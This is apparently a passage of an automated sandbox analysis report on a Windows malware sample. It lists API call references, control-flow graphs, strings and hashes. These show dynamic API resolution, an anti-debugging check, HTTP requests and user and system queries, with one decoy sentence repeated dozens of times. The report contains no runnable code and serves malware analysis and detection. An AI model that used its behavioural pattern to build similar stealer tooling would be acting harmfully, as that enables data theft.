                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 2127927946-2218711628
                                        • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                        • Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
                                        • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                        • Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 670 419af4-419b08 GetProcAddress 668->670 671 419b0d-419b14 668->671 669->668 670->671 673 419b46-419b4d 671->673 674 419b16-419b41 GetProcAddress * 2 671->674 676 419b68-419b6f 673->676 677 419b4f-419b63 GetProcAddress 673->677 674->673 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,00859AD0), ref: 004198A1
                                        • GetProcAddress.KERNEL32(74DD0000,00859A40), ref: 004198BA
                                        • GetProcAddress.KERNEL32(74DD0000,00859AE8), ref: 004198D2
                                        • GetProcAddress.KERNEL32(74DD0000,00859A28), ref: 004198EA
                                        • GetProcAddress.KERNEL32(74DD0000,00859A58), ref: 00419903
                                        • GetProcAddress.KERNEL32(74DD0000,0085A078), ref: 0041991B
                                        • GetProcAddress.KERNEL32(74DD0000,008536A8), ref: 00419933
                                        • GetProcAddress.KERNEL32(74DD0000,008535A8), ref: 0041994C
                                        • GetProcAddress.KERNEL32(74DD0000,00859A70), ref: 00419964
                                        • GetProcAddress.KERNEL32(74DD0000,00859A88), ref: 0041997C
                                        • GetProcAddress.KERNEL32(74DD0000,0085A308), ref: 00419995
                                        • GetProcAddress.KERNEL32(74DD0000,0085A4B8), ref: 004199AD
                                        • GetProcAddress.KERNEL32(74DD0000,00853588), ref: 004199C5
                                        • GetProcAddress.KERNEL32(74DD0000,0085A440), ref: 004199DE
                                        • GetProcAddress.KERNEL32(74DD0000,0085A398), ref: 004199F6
                                        • GetProcAddress.KERNEL32(74DD0000,00853508), ref: 00419A0E
                                        • GetProcAddress.KERNEL32(74DD0000,0085A200), ref: 00419A27
                                        • GetProcAddress.KERNEL32(74DD0000,0085A2F0), ref: 00419A3F
                                        • GetProcAddress.KERNEL32(74DD0000,008534C8), ref: 00419A57
                                        • GetProcAddress.KERNEL32(74DD0000,0085A338), ref: 00419A70
                                        • GetProcAddress.KERNEL32(74DD0000,00853448), ref: 00419A88
                                        • LoadLibraryA.KERNEL32(0085A2D8,?,00416A00), ref: 00419A9A
                                        • LoadLibraryA.KERNEL32(0085A4D0,?,00416A00), ref: 00419AAB
                                        • LoadLibraryA.KERNEL32(0085A248,?,00416A00), ref: 00419ABD
                                        • LoadLibraryA.KERNEL32(0085A2C0,?,00416A00), ref: 00419ACF
                                        • LoadLibraryA.KERNEL32(0085A218,?,00416A00), ref: 00419AE0
                                        • GetProcAddress.KERNEL32(75A70000,0085A410), ref: 00419B02
                                        • GetProcAddress.KERNEL32(75290000,0085A320), ref: 00419B23
                                        • GetProcAddress.KERNEL32(75290000,0085A4E8), ref: 00419B3B
                                        • GetProcAddress.KERNEL32(75BD0000,0085A350), ref: 00419B5D
                                        • GetProcAddress.KERNEL32(75450000,00853488), ref: 00419B7E
                                        • GetProcAddress.KERNEL32(76E90000,0085A158), ref: 00419B9F
                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00419BAA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                        • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                        • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                        APIs
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                        • StrCmpCA.SHLWAPI(?,00861C98), ref: 0040493A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                        • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,00861CD8), ref: 00404DE8
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                        • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                        • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                        • HttpOpenRequestA.WININET(00000000,00861B98,?,00861180,00000000,00000000,00400100,00000000), ref: 00404B15
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 2402878923-2180234286
                                        • Opcode ID: 4872ea734e2ade50fa6c505a52daf55dab53734f57944cdf8fa3e2a33ceb3f57
                                        • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                        • Opcode Fuzzy Hash: 4872ea734e2ade50fa6c505a52daf55dab53734f57944cdf8fa3e2a33ceb3f57
                                        • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocNameProcessUser
                                        • String ID:
                                        • API String ID: 1206570057-0
                                        • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                        • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                        • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                        • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                        APIs
                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                        • ExitProcess.KERNEL32 ref: 0040117E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                        • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                        • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                        • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,00853768), ref: 00419C2D
                                        • GetProcAddress.KERNEL32(74DD0000,008535E8), ref: 00419C45
                                        • GetProcAddress.KERNEL32(74DD0000,0085A578), ref: 00419C5E
                                        • GetProcAddress.KERNEL32(74DD0000,0085A5A8), ref: 00419C76
                                        • GetProcAddress.KERNEL32(74DD0000,0085A5C0), ref: 00419C8E
                                        • GetProcAddress.KERNEL32(74DD0000,0085A548), ref: 00419CA7
                                        • GetProcAddress.KERNEL32(74DD0000,0085C698), ref: 00419CBF
                                        • GetProcAddress.KERNEL32(74DD0000,0085A500), ref: 00419CD7
                                        • GetProcAddress.KERNEL32(74DD0000,0085A518), ref: 00419CF0
                                        • GetProcAddress.KERNEL32(74DD0000,0085A560), ref: 00419D08
                                        • GetProcAddress.KERNEL32(74DD0000,0085A530), ref: 00419D20
                                        • GetProcAddress.KERNEL32(74DD0000,008537E8), ref: 00419D39
                                        • GetProcAddress.KERNEL32(74DD0000,00853668), ref: 00419D51
                                        • GetProcAddress.KERNEL32(74DD0000,00853528), ref: 00419D69
                                        • GetProcAddress.KERNEL32(74DD0000,00853688), ref: 00419D82
                                        • GetProcAddress.KERNEL32(74DD0000,0085F998), ref: 00419D9A
                                        • GetProcAddress.KERNEL32(74DD0000,0085FC08), ref: 00419DB2
                                        • GetProcAddress.KERNEL32(74DD0000,0085C9E0), ref: 00419DCB
                                        • GetProcAddress.KERNEL32(74DD0000,008536E8), ref: 00419DE3
                                        • GetProcAddress.KERNEL32(74DD0000,0085FAD0), ref: 00419DFB
                                        • GetProcAddress.KERNEL32(74DD0000,0085FAE8), ref: 00419E14
                                        • GetProcAddress.KERNEL32(74DD0000,0085FB18), ref: 00419E2C
                                        • GetProcAddress.KERNEL32(74DD0000,0085FBD8), ref: 00419E44
                                        • GetProcAddress.KERNEL32(74DD0000,008536C8), ref: 00419E5D
                                        • GetProcAddress.KERNEL32(74DD0000,0085FB60), ref: 00419E75
                                        • GetProcAddress.KERNEL32(74DD0000,0085FAB8), ref: 00419E8D
                                        • GetProcAddress.KERNEL32(74DD0000,0085F9C8), ref: 00419EA6
                                        • GetProcAddress.KERNEL32(74DD0000,0085F920), ref: 00419EBE
                                        • GetProcAddress.KERNEL32(74DD0000,0085FA10), ref: 00419ED6
                                        • GetProcAddress.KERNEL32(74DD0000,0085F980), ref: 00419EEF
                                        • GetProcAddress.KERNEL32(74DD0000,0085FA58), ref: 00419F07
                                        • GetProcAddress.KERNEL32(74DD0000,0085F938), ref: 00419F1F
                                        • GetProcAddress.KERNEL32(74DD0000,0085F9F8), ref: 00419F38
                                        • GetProcAddress.KERNEL32(74DD0000,0085BE18), ref: 00419F50
                                        • GetProcAddress.KERNEL32(74DD0000,0085F968), ref: 00419F68
                                        • GetProcAddress.KERNEL32(74DD0000,0085F9E0), ref: 00419F81
                                        • GetProcAddress.KERNEL32(74DD0000,00853728), ref: 00419F99
                                        • GetProcAddress.KERNEL32(74DD0000,0085FB30), ref: 00419FB1
                                        • GetProcAddress.KERNEL32(74DD0000,00853748), ref: 00419FCA
                                        • GetProcAddress.KERNEL32(74DD0000,0085F950), ref: 00419FE2
                                        • GetProcAddress.KERNEL32(74DD0000,0085FA70), ref: 00419FFA
                                        • GetProcAddress.KERNEL32(74DD0000,008537A8), ref: 0041A013
                                        • GetProcAddress.KERNEL32(74DD0000,00853368), ref: 0041A02B
                                        • LoadLibraryA.KERNEL32(0085FA28,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                        • LoadLibraryA.KERNEL32(0085FB00,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                        • LoadLibraryA.KERNEL32(0085FA88,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                        • LoadLibraryA.KERNEL32(0085F9B0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
